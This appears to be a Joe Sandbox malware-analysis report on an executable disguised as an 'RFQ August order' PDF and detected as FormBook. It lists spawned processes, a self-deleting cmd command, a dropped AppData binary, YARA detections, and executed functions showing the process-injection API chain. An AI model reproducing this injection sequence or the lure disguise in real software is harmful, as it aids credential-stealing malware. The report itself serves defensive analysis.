Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:50:52
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:50:52
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\RFQ31072024_August order_pdf.exe"
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:50:52
Start date:	31/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	03:50:52
Start date:	31/07/2024
Path:	C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\EqtGqZpPskFq.exe"
Imagebase:	0xd80000
File size:	652'808 bytes
MD5 hash:	536F359F5908B1A9926B6337C3E520D4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:50:53
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\autofmt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\autofmt.exe"
Imagebase:	0x6d0000
File size:	822'272 bytes
MD5 hash:	C72D80A976B7EB40534E8464957A979F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	03:50:53
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\autoconv.exe"
Imagebase:	0x7ff6ee680000
File size:	842'752 bytes
MD5 hash:	A705C2ACED7DDB71AFB87C4ED384BED6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	03:50:53
Start date:	31/07/2024
Path:	C:\Windows\SysWOW64\systray.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\systray.exe"
Imagebase:	0xae0000
File size:	9'728 bytes
MD5 hash:	28D565BB24D30E5E3DE8AFF6900AF098
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.1533795210.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.7%
Total number of Nodes:	295
Total number of Limit Nodes:	13

Executed Functions

Function 06A1A638 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65259675e0cb4562116851beb062dc4898cb9e73e0151581cf62a2efcff04b41
Instruction ID: 31f221eba0ed94aa315ef0dcd0c37e57fa42b975d82716d86d40e5036f944367
Opcode Fuzzy Hash: 65259675e0cb4562116851beb062dc4898cb9e73e0151581cf62a2efcff04b41
Instruction Fuzzy Hash: FE71F6B1D456298FEB64DF66CC407E9FBB6BF89300F10C1AAD50DAA254EB701A85CF40

Function 06A11890 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 046f18904a674d80c50c820926f98098cba55ad07d0edd92708c4c970d31040b
Instruction ID: fecdce59f68c659ca3f95d13bf6059b4a4948c5696e864b9bb173278a122c67f
Opcode Fuzzy Hash: 046f18904a674d80c50c820926f98098cba55ad07d0edd92708c4c970d31040b
Instruction Fuzzy Hash: 292128B0D052589BEB18CFA6C9557DEFFB6AF89300F04C16AD409BA254DB740A46CF90

Function 0236D448 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0236D4D6
GetCurrentThread.KERNEL32 ref: 0236D513
GetCurrentProcess.KERNEL32 ref: 0236D550
GetCurrentThreadId.KERNEL32 ref: 0236D5A9

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 3c6664e9a516e0f758e45880a939aa08749d08fdb85ff6f1315b20a09c5a118e
Instruction ID: 9af8be5beabdb1fc6aeb029f76033acaf114a3f162e8643408b1977082fda54f
Opcode Fuzzy Hash: 3c6664e9a516e0f758e45880a939aa08749d08fdb85ff6f1315b20a09c5a118e
Instruction Fuzzy Hash: 7A5169B0A00349CFDB15DFAAD548BAEBBF5AF88314F24C459E409A73A0D734A944CF65

Function 0236D458 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0236D4D6
GetCurrentThread.KERNEL32 ref: 0236D513
GetCurrentProcess.KERNEL32 ref: 0236D550
GetCurrentThreadId.KERNEL32 ref: 0236D5A9

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1ce3f94b8548404d4c09ce7006cdc6027b0433b01daa9211e12003cc60fb9de5
Instruction ID: b70d15c8159456f5c3fcd7af4fdd1425eb8c8ca62fc649853cb47da9b3588b1c
Opcode Fuzzy Hash: 1ce3f94b8548404d4c09ce7006cdc6027b0433b01daa9211e12003cc60fb9de5
Instruction Fuzzy Hash: 785138B4A007098FDB15DFAAD548BAEBBF5EF88314F20C459E409A7290DB34A944CF65

Function 06A178FC Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A17B3E

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 92d5a9cb1ff6cca9adb039ed03abf34ec074e08c15476d5a2bb693664f116ab2
Instruction ID: d1b53a352a3ae17757f8c0516353a87b4b8e53d66d8cd75d1e39586c5788f086
Opcode Fuzzy Hash: 92d5a9cb1ff6cca9adb039ed03abf34ec074e08c15476d5a2bb693664f116ab2
Instruction Fuzzy Hash: BCA14C71D00219CFEB60DF69C851BEEBBB2BF48310F148569D849AB240DB759A85CF91

Function 06A17908 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A17B3E

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6073a17fef6021aea227a5db8f698655cf3e91656f885719c653fe39d999d887
Instruction ID: 86a169aa1d4df65abcab7cbe334d0bab234deafbf0c3e689142229998be954d7
Opcode Fuzzy Hash: 6073a17fef6021aea227a5db8f698655cf3e91656f885719c653fe39d999d887
Instruction Fuzzy Hash: 20915C71D00319CFEB60DF69C851BEEBBB2BF48310F148569D809AB280DB759A85CF91

Function 0236ADC8 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0236B01E

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3e269f6e9bc3f9bd52aa486f63e48043ead341a0bd75ba2e76726bfc39e9370d
Instruction ID: 7292a29253f93ec3ca1855961f2f8e40f9dbca26df7685a3a840433a83854591
Opcode Fuzzy Hash: 3e269f6e9bc3f9bd52aa486f63e48043ead341a0bd75ba2e76726bfc39e9370d
Instruction Fuzzy Hash: 2A715570A00B058FD724DF6AC45876ABBF6BF88704F008A2DD09AEBA44D735E855CB91

Function 023658ED Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 023659A9

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 42b10d132430c73d4643dddbe68c44fa07ac98a4d201880fc3338308a24dbcfb
Instruction ID: a98b81f58010c9115fe08ef7962d1d12b8ad552ed1ed5db6cd91c9f4baaa95bb
Opcode Fuzzy Hash: 42b10d132430c73d4643dddbe68c44fa07ac98a4d201880fc3338308a24dbcfb
Instruction Fuzzy Hash: C5412270D00719CFEB25DFAAC8887DEBBB5BF89704F20816AD008AB255DB715946CF50

Function 0236449C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 023659A9

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 34192244f01094d6c7d8e57df01d31847265742f86becfe33b010299e4aaa41a
Instruction ID: 7ff0da6f284a3e1679d82eaa7a7895e9124238d3019f6484c25068937e673332
Opcode Fuzzy Hash: 34192244f01094d6c7d8e57df01d31847265742f86becfe33b010299e4aaa41a
Instruction Fuzzy Hash: FB41E170D00719CFEB24DFAAC84879EBBB9BF88704F20816AD408AB255DB756945CF90

Function 06A17280 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A17310

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 56057141559e2a351b765a2abdce559c686753a76429526726d249fdc2a622ec
Instruction ID: ceaec5176a612c9a46a994636ad4abd40a7457fb2eaec2c7e7ab5e9143444a95
Opcode Fuzzy Hash: 56057141559e2a351b765a2abdce559c686753a76429526726d249fdc2a622ec
Instruction Fuzzy Hash: 75212571D003499FDB10DFAAC881BEEBBF5FF48310F10842AE958A7240C7789955DBA4

Function 06A16CA8 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A16D2E

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: db2465c202cf3337f9812fbaba38b9a6a8bb584279a6e72cb4eaeba4a8852cf5
Instruction ID: edc489bc05117a065eede11dafc7fc2ad9e6348752e8580398e001490fb19a1d
Opcode Fuzzy Hash: db2465c202cf3337f9812fbaba38b9a6a8bb584279a6e72cb4eaeba4a8852cf5
Instruction Fuzzy Hash: 13216A71D003098FDB10DFAAC8857EEBBF4EF88210F10842DD459A7240D7789945CFA4

Function 06A17278 Relevance: 1.6, APIs: 1, Instructions: 68
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A17310

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ea00476bd76bf0c7034bf7ecf90d1ce4b54077e2b6a642a5d4ef62c23a05e4a2
Instruction ID: 227bbfb855ea5bc307aef7a11575700ce6342762e0c8993469464b010c3484ee
Opcode Fuzzy Hash: ea00476bd76bf0c7034bf7ecf90d1ce4b54077e2b6a642a5d4ef62c23a05e4a2
Instruction Fuzzy Hash: 2F2124B5D003198FDB10DFAAC881BEEBBF5FF48310F10882AE959A7240C7789955DB64

Function 06A16B98 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNELBASE ref: 06A16C62

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 50f628ef7447c6251e50b5ab45943c65a4e0b8bc5bad3433be4b527c7b4545d4
Instruction ID: 67cf3f33d9e95d5956061ee9720d42e66b2a6cb310562a9fe0f6ff1419714695
Opcode Fuzzy Hash: 50f628ef7447c6251e50b5ab45943c65a4e0b8bc5bad3433be4b527c7b4545d4
Instruction Fuzzy Hash: A72134B0D003099FDB54EFA9D8453EEFBF5EB88314F10846AD419A7240DB38AA45CF91

Function 06A1736A Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A173F0

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 50dc06b3a0f293dddb20d7422c9d20a66d188f4e45e0bd3a6f0cd816f67ccdf0
Instruction ID: c5443adc50e9bb4de0734650c91d124e6d6f9000d4a371de259b513d5b0d6549
Opcode Fuzzy Hash: 50dc06b3a0f293dddb20d7422c9d20a66d188f4e45e0bd3a6f0cd816f67ccdf0
Instruction Fuzzy Hash: F32105719003599FDB10DFAAC881BEEBBF5FF48320F108429E959A7240C7789505DBA5

Function 0236D698 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0236D727

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b0953c3d8875000f47549d20f805406fb0443776604c45f7e76fe52b2a4d0dad
Instruction ID: 1aa584f4efc4ce78475a61923f1e2a5a9d6cf63902be8441b1e466f31d63a212
Opcode Fuzzy Hash: b0953c3d8875000f47549d20f805406fb0443776604c45f7e76fe52b2a4d0dad
Instruction Fuzzy Hash: E42105B590024DDFDB10CFAAD584AEEFFF5EB48310F14801AE954A7250C378A954CF65

Function 06A16CB0 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A16D2E

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: bac901c4ae8ccdca64db26eb1c75176b333fac5258913fe199233e398c99aaf3
Instruction ID: 9308e980343f8048ca452b5ef1c4c8f12df14f2a5b63b105709af546ea180dd7
Opcode Fuzzy Hash: bac901c4ae8ccdca64db26eb1c75176b333fac5258913fe199233e398c99aaf3
Instruction Fuzzy Hash: 16213871D007098FDB10DFAAC4857AEBBF4EF88220F148429D459AB240CB789945CFA4

Function 06A17370 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A173F0

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f57987f727cd5e13bf7261b48c2157c6f97251a1cd499954cf627cce486f9b72
Instruction ID: b232cba10c57b427124f4485faf5e762650d8b68d1cc590e6a4ff120c591cae8
Opcode Fuzzy Hash: f57987f727cd5e13bf7261b48c2157c6f97251a1cd499954cf627cce486f9b72
Instruction Fuzzy Hash: E42114719003599FDB10DFAAC881BEEBBF5FF48320F50842AE959A7240C7789900CBA5

Function 0236D6A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0236D727

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d5d395e0e9db4b4190c050a0f0fd286e6964e38a21c8c21f392930c7b080f3ed
Instruction ID: 20cc1b59070b392e398852ec6f8d7d457b9f2bbb996dc88b684a8b20b25c66b8
Opcode Fuzzy Hash: d5d395e0e9db4b4190c050a0f0fd286e6964e38a21c8c21f392930c7b080f3ed
Instruction Fuzzy Hash: 4B21E6B59002499FDB10CF9AD984ADEBBF8FB48310F14801AE954A3350C374A950CF65

Function 06A171BA Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A1722E

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4303886ed2a161b7a83a379132c1699238a6a1745e9c7d43aabe59ffcf80fb20
Instruction ID: 094a11ad4078ee7690d52ce01299c32cf40926a6f4b9134d46d0602a093378e7
Opcode Fuzzy Hash: 4303886ed2a161b7a83a379132c1699238a6a1745e9c7d43aabe59ffcf80fb20
Instruction Fuzzy Hash: D5116A719003499FDB20DFAAC845BDFBBF5EF88320F108419E515A7250CB75A511CFA4

Function 0236A188 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236B099,00000800,00000000,00000000), ref: 0236B2AA

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3c8fb32a455516f87667171656f93ebe3444c7141f356a5bf4bf63595ec2e0f4
Instruction ID: f58b00c64d7b99eb9983cba806b4eb66f60b0c833bc1a910fe44489ee9856689
Opcode Fuzzy Hash: 3c8fb32a455516f87667171656f93ebe3444c7141f356a5bf4bf63595ec2e0f4
Instruction Fuzzy Hash: 2811E7B59003099FDB10DF9AC444BAEFBF9EB88714F10842ED519B7640C375A545CFA5

Function 06A16BFA Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06A16C62

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 114f18d844710cdb60f4437104a9ba612dd261d1b7c706572e4f71825f460d6e
Instruction ID: a384cdb7b51cd851090d1ccffb838f1aa19d6ad155550fc150c2159fea4d908f
Opcode Fuzzy Hash: 114f18d844710cdb60f4437104a9ba612dd261d1b7c706572e4f71825f460d6e
Instruction Fuzzy Hash: BD1158719003498FDB20DFAAC8857EFFBF9EF88620F208419D519A7240CB79A540CBA4

Function 0236B238 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236B099,00000800,00000000,00000000), ref: 0236B2AA

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f230f29cd41ec2711cc0837a5f5808cbb723a85a38ab28131547c7e0b42603d9
Instruction ID: 41e6aab44e45c947948c2cf03b6e307369bd49df39bd1008505d9c67758a0d55
Opcode Fuzzy Hash: f230f29cd41ec2711cc0837a5f5808cbb723a85a38ab28131547c7e0b42603d9
Instruction Fuzzy Hash: 3F11E4B69003099FDB20CF9AD844BDEFBF5AB88724F10842ED519A7250C379A545CFA5

Function 06A171C0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A1722E

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b1f16220db97fabeba91eb418f0087e90b7959710516788429d44dc5ae147c5c
Instruction ID: 2009d787d8b5309b857e2e886159d93763b7d5c4aae00461f3aa1be2278de364
Opcode Fuzzy Hash: b1f16220db97fabeba91eb418f0087e90b7959710516788429d44dc5ae147c5c
Instruction Fuzzy Hash: C91137719003499FDB20DFAAC845BDEBBF5EF88320F148419E519A7250CB79A550CFA4

Function 06A1B6D0 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06A1B735

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 0022665f9d0df7ab2afc330019ad79ae6fe7ba93046fd380ba2ba0f8e158d683
Instruction ID: abb977e05094b15c282b3f05fbee2e4e53448bcbed556dae36914eb5304cc315
Opcode Fuzzy Hash: 0022665f9d0df7ab2afc330019ad79ae6fe7ba93046fd380ba2ba0f8e158d683
Instruction Fuzzy Hash: 0B11F5B59003499FDB20DF9AD885BDEFBF8EB48320F10841AE958A7640C379A544CFA5

Function 06A16C00 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06A16C62

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 1a57590d252f2d01de55befdfea129e1facce0e8512388f96b3b2fe92130b968
Instruction ID: cbaa61beeb23208a8011ef5568718b32722688b2451be2921717ef9a2a1ed44e
Opcode Fuzzy Hash: 1a57590d252f2d01de55befdfea129e1facce0e8512388f96b3b2fe92130b968
Instruction Fuzzy Hash: 9A113671D003498FDB20DFAAC8457EEFBF9EF88620F248419D559A7240CB79A944CFA4

Function 06A17508 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06A1B735

Memory Dump Source

Source File: 00000000.00000002.1432146687.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a10000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 04a4fef4da876d4e7e257900645279fe9db746dd39389fc06191f60bae386ad1
Instruction ID: c9285c23000b26bc494b54712135a2998706a07f744b6198f53f32b1f10eb674
Opcode Fuzzy Hash: 04a4fef4da876d4e7e257900645279fe9db746dd39389fc06191f60bae386ad1
Instruction Fuzzy Hash: 1A1106B59003499FDB20DF9AC885BDEFBF8EB48320F10841AE558A7640C375A944CFA5

Function 0236AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0236B01E

Memory Dump Source

Source File: 00000000.00000002.1425509119.0000000002360000.00000040.00000800.00020000.00000000.sdmp, Offset: 02360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2360000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
